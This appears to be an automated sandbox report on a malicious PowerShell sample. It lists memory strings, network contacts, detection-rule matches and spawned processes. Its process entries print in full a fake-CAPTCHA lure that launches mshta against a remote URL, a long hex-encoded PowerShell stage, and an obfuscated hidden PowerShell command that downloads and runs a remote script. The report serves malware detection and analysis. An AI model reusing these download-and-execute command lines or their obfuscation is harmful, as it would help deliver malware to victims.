00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4w
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Px&
Source: svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000003.00000003.1696559513.0000026275AD2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000000.00000002.1667002839.0000018B80530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://solve.vw
Source: powershell.exe, 00000000.00000002.1667002839.0000018B804F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://solve.vwX
Source: mshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/R
Source: mshta.exe, 00000002.00000003.1874624534.000001F01B4E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893892244.000001F01B4EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/Z
Source: mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmp, 1.ps1String found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
Source: mshta.exe, 00000002.00000002.1893706123.000001F01B476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d.
Source: mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dC:
Source: mshta.exe, 00000002.00000002.1893645402.000001F01B3F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dH
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dP
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dS
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dV
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dh
Source: mshta.exe, 00000002.00000002.1893706123.000001F01B450000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dl
Source: mshta.exe, 00000002.00000002.1894016581.000001F01B6A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dlorerY)
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.144.62:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B12AF024_2_00007FFD9B12AF02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B129D564_2_00007FFD9B129D56
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B123EA54_2_00007FFD9B123EA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B1F38D44_2_00007FFD9B1F38D4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0076BA406_2_0076BA40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00761D786_2_00761D78
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 5045
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 5045Jump to behavior
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal84.evad.winPS1@11/15@3/3
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rx3j10ix.n01.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: powershell.exeString found in binary or memory: mshta https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d # ?? ''I am not a robot - reCAPTCHA Verification ID: 4885''$global:?
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://solve.vwglq.com/awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64dJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3DJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
